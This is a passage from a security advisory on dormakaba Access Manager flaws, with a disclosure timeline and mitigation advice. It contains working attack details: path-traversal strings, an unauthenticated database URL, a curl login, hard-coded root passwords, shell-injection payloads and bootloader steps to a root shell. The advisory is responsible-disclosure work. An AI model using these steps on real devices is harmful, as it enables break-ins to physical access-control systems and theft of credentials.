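    The prefix check uses root + '/' so that '/www2/x' is not accepted for '/www'.
    (On a real file system, resolve symlinks with os.path.realpath first.)"""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, unquote(url_path).lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PermissionError(f"request escapes {root}: {url_path}")
    return candidate


def escapes_root(url_path, root=WEB_ROOT):
    """True if the contained mapping rejects the request."""
    try:
        contained_map(url_path, root)
        return False
    except PermissionError:
        return True


if __name__ == "__main__":
    for p in ("/index.html",
              "/../../../../../../../flash/Database.sq3",
              "/../../../../../../../windows/Kaba.Idmm.Main.exe",
              "/%2e%2e/%2e%2e/flash/Database.sq3"):
        print(f"{p:48} naive -> {naive_map(p):30} escapes root: {escapes_root(p)}")
```

Decoding before normalising matters: a check that looks for a literal "../" in the
raw request misses the percent-encoded form, which is why the containment test is
done on the final, decoded, normalised path rather than on the request string.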

4) Unauthenticated Access to the SQLite Database (CVE-2025-59100)
To execute the attack, an attacker can simply navigate to the following path:

http://<Access Manager IP>/database/Database.sqlite

If the file exists, it can be downloaded without prior authentication.

5) Insufficient Session Management (CVE-2025-59101)
The issue in the session management can be demonstrated by sending the following request
via curl to log in.

curl http://<Access Manager IP>/login.cgi?password=<passwordhash>

The server then simply responds with "LoggedIn". After a successful login from a
given IP address, all other requests from that address are accepted without any
access token or cookie value.

6) Secrets Stored in Plaintext in Database (CVE-2025-59102)
The Access Manager offers a functionality to export the local SQLite database. The
database contains the whole configuration of the Access Manager. This includes passwords
for the web app, VPN passwords, card IDs, PINs and much more. The export functionality
can be executed after logging in (e.g. with the default password), or by exploiting the
session management issues.

In general, an attacker has many possibilities to get access to the database.
This includes:

- Weak default password (documented in issue 14)
- Unauthenticated Path traversal (documented in issue 3)
- Issues in the Session Management (documented in issue 5)
- Unencrypted Flash Storage (documented in issue 11)

The following listing shows the downloaded database and the contents of the table "Cards".

❯ sqlite3 ~/research/Database.sq3
Enter ".help" for usage hints.
sqlite> SELECT * from Cards;

+----------------------+--------------+------+--------------+
|        CardId        | SitekeyIndex |  Pin | AccessRights |
+----------------------+--------------+------+--------------+
| 0000000000000000000A |            0 | 1234 |              |
| 00000000000000000000 |            0 | 1234 |              |
| 00000000000000000006 |            0 | 5678 |              |
| 00000000000000000009 |            0 | 9999 |              |
| 00000000000000000000 |            0 | 9999 |              |
+----------------------+--------------+------+--------------+

7) Missing Transport Layer Encryption
No separate proof of concept has been created. Please review the general
description above.

8) Weak Default Passwords for SSH Access (CVE-2025-59103)
The root password is set using the following functions:

-----------------------------------------------------------------
   1 check_etc_shadow() {
   2     if [ -f /etc/shadow ] && [ -s /etc/shadow ]; then
   3         ROOT_PASSWD_HASH=$(grep root < /etc/shadow  | cut -d ':' -f 2)
   4     else
   5         echo "/etc/shadow missing or empty, creating it ..."
   6         touch /etc/shadow
   7         # only make it readable for root, as that is the purpose the shadow file was introduced for
   8         chmod go-rwx /etc/shadow
   9         # restoring default password for update_user
  10         echo "update_user:\$1\$ombaQHlp\$jqdDyjpD2PJ.6j74PlwDd0:::::::" > /etc/shadow
  11     fi
  12
  13     if [ -z "$ROOT_PASSWD_HASH" ]; then
  14         echo "'/etc/shadow' corrupted! Trying to fix it ..."
  15         echo "root:\$5\$:::::::" >> /etc/shadow
  16     fi
  17 }
  18
  19 # TODO: This check can be removed in future if it is possible to set the time in Barebox / or we decide we don't need the time to be set
  20 check_date() {
  21     if [ "$(date +%Y)" -lt "2022" ]; then
  22       echo "Date has not been set, will not change root password."
  23       exit 1;
  24     fi
  25 }
  26
  27 check_etc_shadow
  28 check_date
  29
  30 if [ -n "$ROOT_PASSWD_HASH" ]; then
  31     SALT=$(echo "$ROOT_PASSWD_HASH" | cut -d '$' -f 3)
  32     EAC_PASSWD_HASH=$(mkpasswd -m sha256 -S "$SALT" eac)
  33 fi
  34
  35 if [ "$EAC_PASSWD_HASH" = "$ROOT_PASSWD_HASH" ] || [ ! -f /opt/dormakaba/jail/fp.txt ]; then
  36     echo "Detected standard password or missing fingerprint. Generating new password ..."
  37     GENERATED_PASSWORD=$(head -c 32 /dev/urandom | md5sum | head -c 32)
  38     # create fingerprint file
  39     ENCRYPTED_PASSWORD=$(echo "$GENERATED_PASSWORD" | openssl rsautl -pkcs -encrypt -inkey "$ENCRYPTION_CERT" -pubin | openssl enc -base64)
  40     create_fingerprint_file > "$FINGERPRINT_FILE"
  41     # change password
  42     yes "$GENERATED_PASSWORD" | passwd -a sha256 root
  43 else
  44     echo "Password will not be changed."
  45 fi
  -----------------------------------------------------------------

It can clearly be seen that under multiple circumstances the password is not
properly set (e.g. date is lower than 2022 in line 21). Under those circumstances,
which we have observed in the wild, the following users and passwords
are hard-coded and can be used to log into the devices:

root:eac
update_user:secret

9) Potential Command Injection/Argument Injection
The vulnerable code can be seen in the following code listing. The parameter
"newPassword" is controlled by the attacker.

-----------------------------------------------------------------
string newPasswordEscaped = newPassword;
newPasswordEscaped = newPasswordEscaped.Replace("\"", "\\\"");
newPasswordEscaped = newPasswordEscaped.Replace("'", "'\\''");
string args = "-c \"printf '%s\n%s' '" + newPasswordEscaped + "' '" + newPasswordEscaped + "' | passwd update_user\"";

if (!SystemApi.RunSystemProcess("sh", args))
{
	TraceSettings.TraceWithErrorLevel("SettingsController.SetPassword: Changing password on platform level failed!");
	response.StatusCode = 500;
	return false;
}
-----------------------------------------------------------------
During our research we were able to identify multiple cases that can be
potentially exploited:

- Potential Argument Injection
- Potential Command Injection
- DoS

By setting the following password, it was not possible to execute a command,
but we believe that with more time and a more detailed look at the shell used,
a successful attack might be possible due to the custom filtering implemented.

\\\"; touch /tmp/test;

Strace output:

[pid 1234] execve("/usr/bin/sh", ["/usr/bin/sh", "-c", "printf '%s%s' '\\;", "touch", "/tmp/test; \\; touch /tmp/test;' | echo 'success'"], 0x55a70daabeef /* 63 vars */) = 0

The following password, set via the web UI, results in an argument injection
in the shell (busybox) used.

  \\\"; -h;

[pid 1234] execve("/usr/bin/sh", ["/usr/bin/sh", "-c", "printf '%s%s' '\\;", "-h \\; -h' | echo 'success'"], 0x55a70daabeef /* 63 vars */) = 0
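As an added example (not the product's code), the following Python shows the hardened counterpart of the snippet in issue 9: the new password is written to passwd's stdin and the argv is a fixed list, so no shell and no hand-written quoting are involved. Piping the password twice into passwd is the same mechanism the product's own script uses; the account allow-list and the length limits are assumptions made here.

```python
import subprocess

# Accounts whose password the web UI may change; the name is never user-controlled.
ALLOWED_USERS = {"update_user"}          # assumed allow-list
MIN_LEN, MAX_LEN = 8, 128                # assumed policy limits

def build_passwd_invocation(user: str, new_password: str):
    """Return (argv, stdin_bytes) for changing `user`'s password without a shell.

    Raises ValueError when the input could not be handed to passwd unambiguously.
    """
    if user not in ALLOWED_USERS:
        raise ValueError("unknown account")
    if not MIN_LEN <= len(new_password) <= MAX_LEN:
        raise ValueError("password length out of range")
    # passwd reads the new password twice, one per line, so a line break or NUL
    # inside the password would be read as a delimiter; everything else
    # (quotes, backslashes, semicolons) is passed through untouched.
    if any(ch in new_password for ch in "\r\n\x00"):
        raise ValueError("control characters are not allowed")
    argv = ["passwd", user]              # fixed argv: no "sh -c", no quoting
    stdin_bytes = f"{new_password}\n{new_password}\n".encode()
    return argv, stdin_bytes

def change_password(user: str, new_password: str) -> bool:
    """Run passwd with the prepared argv and stdin; True on success."""
    argv, stdin_bytes = build_passwd_invocation(user, new_password)
    result = subprocess.run(argv, input=stdin_bytes, capture_output=True, timeout=30)
    return result.returncode == 0
```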


10) Unlocked Bootloader (CVE-2025-59104)
An attacker can connect to the debug footprint. The UART has to be configured
for 1.8V, 115200 Baud, 8N1. When starting the Access Manager, the attacker
will read the following lines on the UART:

-----------------------------------------------------------------
barebox 2017.09.0-BSP-Yocto-phyBOARD-Segin-dormakaba.17.2 #1 Thu Jan 27 19:40:11 CET 2022
Board: Phytec phyCORE-i.MX6 Ultra Lite SOM
detected i.MX6 UltraLite revision 1.2
[...]
running /env/bin/init...
Hit m for menu or any other key to stop autoboot:
-----------------------------------------------------------------

Pressing any key will now drop the attacker into the barebox bootloader shell.
To mount the nand flash, the attacker can execute the "nand-a" script located
under "/env/boot/nand-a". In order to elevate privileges to a root shell, the attacker
will now modify the kernel command line. This is done by manually setting an
environment variable:

-----------------------------------------------------------------
global.linux.bootargs.dyn.root="system0 console=ttymxc0,115200n8 root=ubi0:root-a ubi.mtd=root rootfstype=ubifs rw POR init=/bin/sh"
-----------------------------------------------------------------

Then, the "bootm" command has to be executed to boot the system.
The device will report:

-----------------------------------------------------------------
Loading ARM Linux zImage '/dev/nand0.root.ubi.kernel-a'
Loading devicetree from '/dev/nand0.root.ubi.oftree-a'
commandline: console=ttymxc0,115200n8 system0 console=ttymxc0,115200n8 root=ubi0:root-a
ubi.mtd=root rootfstype=ubifs rw POR init=/bin/sh
[0.000000] Booting Linux on physical CPU 0x0
[0.000000] Linux version 5.10.76 (jenkins@...5fe09bc8d) (arm-linux-gnueabihf-gcc (Linaro
GCC 7.3-2018.05) 7.3.1 20180425 [linaro-7.3-2018.05 revision
d29120a424ecfbc167ef90065c0eeb7f91977701], GNU ld (Linaro_Binutils-2018.05) 2.28.2.20170706)
#1 SMP Tue Jun 6 10:39:07 UTC 2023
[0.000000] CPU: ARMv7 Processor [410fc075] revision 5 (ARMv7), cr=10c5387d
[...]
[2.768093] Run /bin/sh as init process
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
----------------------------------------------------------------
Thus, the attacker now has full access to the system.

11) Unencrypted Flash Storage (CVE-2025-59105)
Every Access Manager is equipped with a flash chip that contains the whole Windows CE
embedded or Linux-based operating system as well as the configuration, binaries and
libraries to run the Access Manager. The flash chip itself can be easily desoldered
from the Access Manager.

The contents can be dumped and analyzed. It was identified that the whole flash dump
is unencrypted. This allows an attacker to easily analyze the applications, as well as
extract secrets, like passwords and cryptographic keys.

12) Web Server Running with Root Privileges (CVE-2025-59106)
No separate proof of concept was created.

13) Static Firmware Encryption Password (CVE-2025-59107)
The hardcoded firmware encryption password is found in a DLL which belongs
to the tool FWServiceTool. The DLL Firmware.Container.dll contains the ZIP
password and can be extracted by disassembling the DLL in dnSpy.
The .NET class FirmwareContainerFactory then contains the password:
private const string Password = "649dce<redacted>801c81";

14) Weak Default Passwords (CVE-2025-59108)
The password 'admin' can be used to login to the web interface of the Access Manager,
to change arbitrary settings or to gain access to a full database export. This password
is set by default and a user is not forced to change the password.


Vulnerable / tested versions:
-----------------------------
Initially, many vulnerabilities were identified in a dormakaba access manager
9200-k5 (03.03.016 RA). However, the versions 04.06.189 RA (9200-k5) and
05.00.073 RA and 05.01.088 RA (9200-k7) were also subject to testing. For the
detailed version information, refer to the vulnerability descriptions above.


Vendor contact timeline:
------------------------
2024-04-02: Contacting vendor through securitysupport@...makaba.com, no response
2024-04-05: Contacting vendor again through securitysupport@...makaba.com, no response
2024-04-09: Contacting vendor again through info@...makaba.com and helpdesk.awm.ch@...makaba.com
2024-04-09: info@...makaba.com and helpdesk.awm.ch@...makaba.com informed us
             that they are not responsible for Austrian "Customers" and we should
             contact the Austrian dormakaba entity.
2024-04-09: Contacting vendor again through info@...makaba.com, helpdesk.awm.ch@...makaba.com
             and securitysupport@...makaba.com. Explaining that this is not a local
             Austrian problem, but a global issue for dormakaba. Requesting a Global
             Security Contact.
2024-04-09: Instead of forwarding our message to the global security team a local
             Austrian dormakaba representative called us. We closed the call down by
             requesting a contact of dormakaba's global security team.
2024-04-09: The Austrian representative requests the advisory via E-Mail. Asking for
             confirmation, if mail encryption is supported or if the advisory
             shall be forwarded unencrypted.
2024-04-10: Scheduling a conference call with the Austrian contact to clarify everything
             and explain the security issues.
2024-04-10: Conference call got cancelled. The Austrian contact forwarded our request to
             the headquarters in Switzerland.
2024-04-10: dormakaba's CISO contacted us via email and informed us that they would get
             back to us as soon as possible.
2024-04-12: dormakaba's DVP Systems Access Control and Owner Security Governance contacted
             us via email and provided us with a secure channel to submit the advisory. The
             advisory got submitted immediately.
2024-04-12: dormakaba's DVP Systems Access Control and Owner Security Governance requests
             details about the tested firmware and software version.
2024-04-15: SEC Consult provides detailed software and firmware version that was tested.
2024-04-16: dormakaba updates us and informs us that they are actively investigating
             the reported issues.
2024-04-30: Asking for a status update & offering a meeting to discuss any questions.
2024-04-30: dormakaba's CISO replies by accepting our meeting offer. Scheduling a meeting
             for 2024-05-07.
2024-05-07: Meeting with dormakaba's CISO and DVP Systems Access Control. All vulnerabilities
             are confirmed and actively worked on. Discussing further steps and agreeing on a
             monthly update meeting with dormakaba.
2024-05-08: Providing further details concerning the vulnerabilities as well as
             providing a set of questions (Vulnerable Versions, Firmware, Revisions), proposing
             meeting dates; no response
2024-05-23: Asking for a status update, no response
2024-06-03: Asking again for a status update.
2024-06-04: dormakaba's CISO replies with a meeting invite.
2024-06-05: Meeting with dormakaba for the scheduled monthly update meeting.
2024-07-24: Asking again for a status update, no response.
2024-07-31: Asking again for a status update or meeting, no response.
2024-08-19: Asking again for a status update or meeting.
2024-08-27: Scheduling a call for 2024-09-03
2024-09-03: dormakaba technician provides status update about which vulnerabilities are already
             fixed in the next release and on which they are still actively working.
2024-11-12: Asking for a status update and informing dormakaba that we tested a newer hardware
             release of the dormakaba Access Manager (9200-K7) which is based on Linux.
             Multiple new critical vulnerabilities were identified. A separate advisory
             is in the making.
2024-12-12: Meeting with dormakaba to discuss new identified issues in other hardware releases.
2025-01-16: Added vulnerability "Unauthenticated access to the internal SQLite Database" &
             "Static firmware encryption password", see SEC Consult advisory 20260126-1.
2025-01-17: Providing updated advisory to dormakaba, asking for a status update regarding
             the other issues.
2025-01-28: Asking for status update again. Vendor responds that they received our
             updated advisory and they are preparing a feedback.
2025-02 - 2026-01: Monthly meetings with dormakaba to discuss the current developments.
2026-01-26: Public release of the advisory.


Solution:
---------
In general, we recommend the following workflow when it comes to
mitigating the vulnerabilities and issues mentioned in this advisory:
- Check your exos 9300 and access manager version numbers.
- Contact your dormakaba partner.
     - The vulnerabilities detailed in this advisory have
       been worked on and fixed by dormakaba over the past 18 months
     - Chances are high that your devices are already up to date, or that the
       steps needed to mitigate all (remaining) issues in your environment are
       already available to you.
- Clarify with your dormakaba partner:
     - If there are any manual steps that must be done after an update to
       fully prevent the vulnerabilities.
     - If the official hardening guide in the latest version is already implemented.
     - How to implement mTLS for the SOAP API in your environment
- If old hardware revisions are in use (e.g. Access Manager 9200-k5) replace
   them as soon as possible with newer hardware.
- Review the website provided by dormakaba which was created specifically
   for all the vulnerabilities documented in this advisory for more details
   and insights from the manufacturer side. The vendor's security page is
   available at the following location: https://www.dormakabagroup.com/en/security-advisories


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application: https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices: https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult

EOF Werner Schober, Clemens Stockenreitner / @2026



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/